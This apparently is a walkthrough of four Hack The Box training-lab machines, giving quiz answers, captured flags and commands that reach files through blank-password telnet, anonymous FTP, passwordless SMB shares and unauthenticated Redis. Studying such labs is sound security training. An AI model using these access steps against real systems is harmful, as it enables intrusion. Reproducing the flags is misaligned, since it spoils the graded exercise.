Meow

What does the acronym VM stand for?

Virtual Machine

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.

terminal

What service do we use to form our VPN connection into HTB labs?

openvpn

What tool do we use to test our connection to the target with an ICMP echo request?

ping

What is the name of the most common tool for finding open ports on a target?

nmap

What service do we identify on port 23/tcp during our scans?

telnet

What username is able to log into the target over telnet with a blank password?

root

Submit root flag

b40abdfe23665f766f9c61ecba8a4c19

Fawn

What does the 3-letter acronym FTP stand for?

File Transfer Protocol

Which port does the FTP service listen on usually?

21

FTP sends data in the clear, without any encryption. What acronym is used for a later protocol designed to provide similar functionality to FTP but securely, as an extension of the SSH protocol?

sftp

What is the command we can use to send an ICMP echo request to test our connection to the target?

ping

From your scans, what version is FTP running on the target?

vsftpd 3.0.3

commands

$ sudo nmap -sV 10.129.74.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 14:37 UTC
Nmap scan report for 10.129.74.149
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

From your scans, what OS type is running on the target?

Unix

What is the command we need to run in order to display the ‘ftp’ client help menu?

ftp -?

What is username that is used over FTP when you want to log in without having an account?

anonymous

What is the response code we get for the FTP message ‘Login successful’?

230

commands

$ ftp -p anonymous@10.129.74.149 
Connected to 10.129.74.149.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.

ls

What is the command used to download the file we found on the FTP server?

get

Submit root flag

035db21c881520061c53e0536e44f815

commands

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||65431|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************************************************************************************************************|    32        0.16 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.03 KiB/s)

Dancing

What does the 3-letter acronym SMB stand for?

Server Message Block

What port does SMB use to operate at?

445

What is the service name for port 445 that came up in our Nmap scan?

microsoft-ds

commands

$ nmap 10.129.115.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 01:30 UTC
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 13.41% done; ETC: 01:35 (0:04:12 remaining)
Nmap scan report for 10.129.115.132
Host is up (1.9s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
10025/tcp filtered unknown

What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?

-L

commands

$ smbclient --no-pass -L 10.129.115.132

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk  

How many shares are there on Dancing?

4

What is the name of the share we are able to access in the end with a blank password?

WorkShares 

What is the command we can use within the SMB shell to download the files we find?

get

Submit root flag

5f61c10dffbc77a704d76016a22f1664

$ smbclient --no-pass //10.129.115.132/WorkShares 
smb: \> ls
  .                                   D        0  Mon Mar 29 08:22:01 2021
  ..                                  D        0  Mon Mar 29 08:22:01 2021
  Amy.J                               D        0  Mon Mar 29 09:08:24 2021
  James.P                             D        0  Thu Jun  3 08:38:03 2021
smb: \> cd James.P
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> quit

Redeemer

Which TCP port is open on the machine?

6379

commands

$ rustscan -a  10.129.7.120 
PORT     STATE SERVICE REASON
6379/tcp open  redis   syn-ack

Which service is running on the port that is open on the machine?

redis

What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database

In-memory Database

Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.

redis-cli

Which flag is used with the Redis command-line utility to specify the hostname?

-h

Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?

info

What is the version of the Redis server being used on the target machine?

5.0.7

commands

$ redis-cli -h 10.129.7.120 info | grep redis_version

redis_version:5.0.7

Which command is used to select the desired database in Redis?

select

How many keys are present inside the database with index 0?

4

commands

redis-cli -h 10.129.7.120 -n 0 keys '*'            
1) "flag"
2) "numb"
3) "stor"
4) "temp"

Which command is used to obtain all the keys in a database?

keys *

Submit root flag

03e1d2b376c37ab3f5319922053953eb

commands

$ redis-cli -h 10.129.7.120 -n 0 get 'flag' 
"03e1d2b376c37ab3f5319922053953eb"

Explosion (VIP)

Preignition (VIP)

Mongod (VIP)

Synced (VIP)